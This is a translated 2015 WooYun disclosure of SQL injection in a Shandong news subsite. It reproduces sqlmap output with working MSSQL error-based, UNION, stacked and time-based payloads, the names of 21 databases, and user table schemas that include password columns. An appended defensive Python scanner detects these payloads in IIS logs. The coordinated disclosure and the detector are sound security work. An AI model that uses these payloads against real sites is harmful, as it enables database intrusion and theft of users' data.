Vulnerability summary

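Bug ID: wooyun-2015-0158958

Title: SQL injection in a subsite of China Shandong Net (21 databases can be dumped; user information and a large number of records exposed)

Vendor: cncert (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-12-08 11:30

Fixed: 2016-01-23 15:16

Disclosed: 2016-01-23 15:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling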

Source: http://www.wooyun.org


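Vulnerability details

Disclosure status:

2015-12-08: Details reported to the vendor; waiting for the vendor to respond
2015-12-11: Vendor confirmed; details disclosed to the vendor only
2015-12-21: Details disclosed to core white hats and experts in related fields
2015-12-31: Details disclosed to regular white hats
2016-01-10: Details disclosed to trainee white hats
2016-01-23: Details disclosed to the public

Brief description:

On one subsite, all 21 databases can be dumped, a large number of records can be leaked, and the user information and passwords of several subsites can also be leaked.

Detailed description:

China Shandong Net (**.**.**.**) is a national key news website established with the approval of the State Council Information Office. It is supervised by the Information Office of the Shandong Provincial People's Government, sponsored by the publisher of the magazine 走向世界, planned and operated by 新之航 Media Group's Shandong Net New Media Co., Ltd., and was officially launched in 1996.
Injection point:

http://**.**.**.**/comp/110/?title=1


The title parameter is injectable.
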
GET parameter 'title' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Place: GET
Parameter: title
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: title=1%' AND 9852=CONVERT(INT,(SELECT CHAR(113)+CHAR(104)+CHAR(112)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (9852=9852) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(102)+CHAR(103)+CHAR(113))) AND '%'='
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: title=1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(104)+CHAR(112)+CHAR(105)+CHAR(113)+CHAR(119)+CHAR(90)+CHAR(70)+CHAR(81)+CHAR(71)+CHAR(101)+CHAR(103)+CHAR(106)+CHAR(102)+CHAR(84)+CHAR(113)+CHAR(116)+CHAR(102)+CHAR(103)+CHAR(113),NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: title=1%'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: title=1%' WAITFOR DELAY '0:0:5'--
---
[00:52:22] [INFO] testing Microsoft SQL Server
[00:52:22] [INFO] confirming Microsoft SQL Server
[00:52:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[00:52:23] [INFO] fetching current user
current user: 'idollar'
[00:52:24] [INFO] fetching current database
current database: 'SDSW20_Other'
[00:52:24] [INFO] testing if current user is DBA
current user is DBA: False
database management system users [2]:
[*] idollar
[*] sa
available databases [21]:
[*] 91haofang
[*] adv_new
[*] bbs
[*] cms_newair
[*] jiaju
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SD_QIYE
[*] SDSW20_Ads
[*] SDSW20_Ask
[*] SDSW20_Digg
[*] SDSW20_HR
[*] SDSW20_Main
[*] SDSW20_Other
[*] SDSW20_Rank
[*] SDSW20_Video_old
[*] tempdb
[*] yycar
Database: jiaju
Table: administrator
[4 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| AdminID | int |
| AdminName | varchar |
| LoginTime | datetime |
| Pwd | varchar |
+-----------+----------+
Database: SDSW20_Main
Table: shds_UserInfo
[9 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| Address | nvarchar |
| Code | nvarchar |
| Desc | nvarchar |
| Email | nvarchar |
| ID | int |
| RealName | nvarchar |
| Tel | nvarchar |
| UserName | nvarchar |
| YouBian | nvarchar |
+----------+----------+
Database: bbs
Table: Sd_users
[46 columns]
+---------------+---------------+
| Column | Type |
+---------------+---------------+
| accessmasks | int |
| adminid | int |
| avatarshowid | int |
| bday | char |
| credits | int |
| digestposts | smallint |
| email | char |
| extcredits1 | decimal |
| extcredits2 | decimal |
| extcredits3 | decimal |
| extcredits4 | decimal |
| extcredits5 | decimal |
| extcredits6 | decimal |
| extcredits7 | decimal |
| extcredits8 | decimal |
| extgroupids | char |
| gender | int |
| groupexpiry | int |
| groupid | smallint |
| invisible | int |
| joindate | smalldatetime |
| lastactivity | datetime |
| lastip | char |
| lastpostid | int |
| lastposttitle | nchar |
| lastvisit | datetime |
| newpmcount | int |
| newsletter | int |
| nickname | nchar |
| oltime | bigint |
| onlinestate | int |
| pageviews | int |
| password | char |
| pmsound | int |
| posts | int |
| ppp | int |
| regip | char |
| salt | nchar |
| secques | char |
| showemail | int |
| sigstatus | int |
| spaceid | int |
| templateid | smallint |
| tpp | int |
| uid | int |
| username | nchar |
+---------------+---------------+
Database: bbs
Table: Sd_endmanager
[6 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| email | nvarchar |
| password | nvarchar |
| regip | nvarchar |
| regtime | datetime |
| uid | int |
| username | nvarchar |
+----------+----------+
Database: SDSW20_HR
Table: School_Login
[7 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| answer | varchar |
| id | int |
| IPAdd | varchar |
| question | varchar |
| regtime | datetime |
| slname | varchar |
| slpwd | varchar |
+----------+----------+


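Only the column names of some tables are listed here; I did not dump the data!~~~ Otherwise there would be a lot of data, and it is very important!~~~

Proof of vulnerability:

See the detailed description.

Fix:

Filtering?

Copyright notice: when reposting, please credit the source 路人甲@乌云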
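
A defender-side use of the sqlmap output above, as an added example that is not part of the original report: a Python script that scans IIS W3C log lines for the four techniques sqlmap listed for the title parameter, and marks WAITFOR probes whose response time shows the injected delay actually ran. The log field layout, client IPs, timings and the shortened payloads in SAMPLE_LOG are constructed assumptions.

```python
"""Classify SQL injection probes in IIS W3C logs by the techniques sqlmap reported."""
import re
from urllib.parse import parse_qsl, quote

# One signature per technique named in the sqlmap output (MSSQL syntax).
ERROR_BASED = re.compile(r"\bCONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT\b", re.I)
UNION_NULL = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\s+(?:NULL\s*,\s*)+", re.I)
WAITFOR = re.compile(r"\bWAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)'", re.I)


def classify(value):
    """Return (technique, delay_seconds) pairs found in one decoded parameter value."""
    hits = []
    if ERROR_BASED.search(value):
        hits.append(("error-based", None))
    if UNION_NULL.search(value):
        hits.append(("UNION query", None))
    m = WAITFOR.search(value)
    if m:
        hours, minutes, seconds = map(int, m.groups())
        # A ';' directly before WAITFOR means a second, stacked statement.
        stacked = value[:m.start()].rstrip().endswith(";")
        technique = "stacked queries" if stacked else "time-based blind"
        hits.append((technique, hours * 3600 + minutes * 60 + seconds))
    return hits


def scan(log_lines):
    """Return one finding per (request, parameter, technique)."""
    fields, findings = [], []
    for line in log_lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for following records
            continue
        if not line.strip() or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        taken_ms = int(rec.get("time-taken", 0))
        query = rec.get("cs-uri-query", "")
        for name, value in parse_qsl(query, keep_blank_values=True):
            for technique, delay in classify(value):
                findings.append({
                    "ip": rec.get("c-ip"),
                    "param": name,
                    "technique": technique,
                    "status": rec.get("sc-status"),
                    # Response took at least the injected delay: the statement ran.
                    "delay_executed": delay is not None and taken_ms >= delay * 1000,
                })
    return findings


def _sample(ip, title, status, ms):
    """Build one constructed log record with a percent-encoded title value."""
    return (f"2015-12-08 00:52:20 GET /comp/110/ "
            f"title={quote(title, safe='')} {ip} {status} {ms}")


# Constructed sample log; payloads are shortened forms of those in the report.
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken",
    _sample("192.0.2.10", "1", 200, 48),
    _sample("198.51.100.7",
            "1%' AND 9852=CONVERT(INT,(SELECT CHAR(113)+CHAR(104))) AND '%'='", 500, 61),
    _sample("198.51.100.7",
            "1%' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(104),NULL--", 200, 70),
    _sample("198.51.100.7", "1%'; WAITFOR DELAY '0:0:5'--", 200, 5043),
    _sample("198.51.100.7", "1%' WAITFOR DELAY '0:0:5'--", 200, 5038),
    _sample("203.0.113.5", "1' WAITFOR DELAY '0:0:5'--", 200, 35),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with delay_executed set to True is the one to escalate first: it means the request was not only a probe, the database ran the injected statement.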


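Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-12-11 16:28

Vendor reply:

CNVD confirmed and reproduced the issue described. It has been passed on through CNCERT to the Shandong branch center, which will follow up and coordinate with the organization that manages the website to handle it.

Latest status:

None yet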

